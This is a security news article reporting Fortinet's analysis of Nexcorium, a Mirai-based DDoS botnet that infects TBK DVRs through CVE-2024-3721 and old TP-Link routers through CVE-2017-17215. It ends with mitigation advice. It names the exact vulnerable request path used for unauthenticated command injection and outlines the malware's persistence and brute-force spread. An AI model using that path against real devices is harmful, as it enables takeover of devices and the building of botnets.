A newly identified botnet campaign is actively exploiting a critical flaw in TBK digital video recorders (DVRs) to deploy a dangerous piece of malware known as Nexcorium. This Mirai-based threat is specifically engineered to launch large-scale distributed denial-of-service (DDoS) attacks, posing a significant risk to online services and infrastructure.
The vulnerability at the core of this campaign is identified as CVE-2024-3721, which carries a CVSS score of 6.3. This flaw primarily affects TBK DVR-4104 and DVR-4216 device models. These particular DVRs have become prime targets due to their prevalence, often coupled with outdated firmware and consistently weak default credentials, making them easy entry points for exploitation.
Hackers Exploit CVE-2024-3721 to Infect TBK DVRs With Nexcorium DDoS Malware
TBK DVR devices impacted by this campaign have long been a concern for security researchers. Their widespread deployment in small businesses, retail environments, and various surveillance setups makes them susceptible, especially where regular firmware patching is not a priority.
Once attackers locate an exposed device, they can send a specifically crafted HTTP request to a vulnerable endpoint. This request, targeting the path /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___, allows for the injection of operating system commands. Crucially, this exploitation occurs without requiring any form of authentication, granting attackers remote code execution capabilities.
This capability transforms these security camera recorders into unwilling participants in a coordinated attack network. Fortinet’s FortiGuard Labs researchers were instrumental in identifying and analyzing this campaign. Their detailed findings tracked the entire infection chain, from the initial exploitation of CVE-2024-3721 through payload delivery and the establishment of persistence.
The analysis confirmed that Nexcorium shares a fundamental architecture with the original Mirai botnet. Key components include an XOR-encoded configuration table, a watchdog module designed to ensure the malware remains active, and a dedicated DDoS attack module ready to flood targets with traffic on command.
Fortinet observed that upon execution, the malware displays a distinct message: “nexuscorp has taken control.” This appears to be a deliberate signature embedded by the threat actors, announcing their successful compromise of the infected device.
However, the campaign’s reach extends beyond just TBK DVRs. Researchers also noted Nexcorium targeting end-of-life TP-Link Wi-Fi routers. This is achieved by exploiting a different vulnerability, CVE-2017-17215, effectively widening the pool of potentially infected devices.
This dual-target approach indicates a strategic effort to build a broad, heterogeneous botnet. By compromising hardware that organizations and home users are unlikely to update or replace in a timely manner, threat actors create a more resilient and expansive attack infrastructure.
The combined resources of these compromised device types can generate massive traffic floods. Such floods are capable of targeting online services, businesses, and even critical infrastructure, disrupting operations and causing significant damage.
Compromised DVRs and routers often run continuously and possess legitimate IP addresses. This can make the resulting botnet traffic appear less suspicious to many filtering systems, complicating efforts to block Nexcorium-driven attacks effectively.
How Nexcorium Establishes Persistence and Evades Detection
Once Nexcorium infects a TBK DVR, its operational sequence is designed for robust persistence, aiming to remain active through device reboots and manual intervention attempts.
The initial exploitation of CVE-2024-3721 facilitates the retrieval of a downloader script. This script then identifies the underlying Linux system’s processor architecture. Based on this detection, it downloads the appropriate compiled binary variant of the malware, tailored for the specific hardware.
Nexcorium’s multi-architecture support means it can infect a wide array of IoT hardware beyond the initially targeted devices without requiring significant code modifications. This adaptability is a key factor in its widespread potential.
After deploying the correct binary, the malware implements several persistence mechanisms. These are designed to ensure its survival through system reboots and attempts to terminate its processes manually.
Fortinet’s research indicated that Nexcorium establishes a command and control (C2) communication channel. This channel empowers the botnet operator to issue DDoS commands, monitor the status of compromised devices, and push further instructions directly to the infected nodes.
Further strengthening its hold, the malware runs a watchdog process. This process continuously monitors the main payload process, automatically restarting it if any interruption occurs.
A notable self-protection feature identified by Fortinet is the use of FNV-1a hashing algorithms by Nexcorium to verify its own binary integrity. If the file on disk has been tampered with or is no longer readable, possibly due to partial deletion or antivirus interference, the malware will dynamically copy itself under a new filename to re-establish its presence.
In addition to these self-preservation tactics, Nexcorium actively seeks to spread. It launches aggressive Telnet-based brute-force attacks against other devices on the same network and beyond. For this propagation, it utilizes a hardcoded list of common default credentials, enabling it to spread without further attacker input.
Organizations and individuals utilizing TBK DVR-4104 or DVR-4216 devices are strongly advised to replace them immediately with currently supported models. Given that the vendor has not released a patch for CVE-2024-3721 and these devices are considered end-of-life from a security perspective, their continued use poses an unacceptable risk.
Similarly, any TP-Link routers running outdated firmware susceptible to CVE-2017-17215 should also be retired and replaced with more secure alternatives.
Network administrators should prioritize ensuring all internet-facing IoT devices employ strong, unique passwords, avoiding the use of factory defaults. This is critical as the Nexcorium malware’s brute-force module specifically targets devices still configured with common credentials.
Implementing network segmentation is also highly recommended. This strategy involves isolating DVRs and surveillance hardware from critical internal systems, thereby limiting the potential damage if a device is compromised.
Where feasible, disabling remote access to DVR management interfaces that do not require external connectivity is one of the most effective measures to reduce the attack surface exploited by this campaign.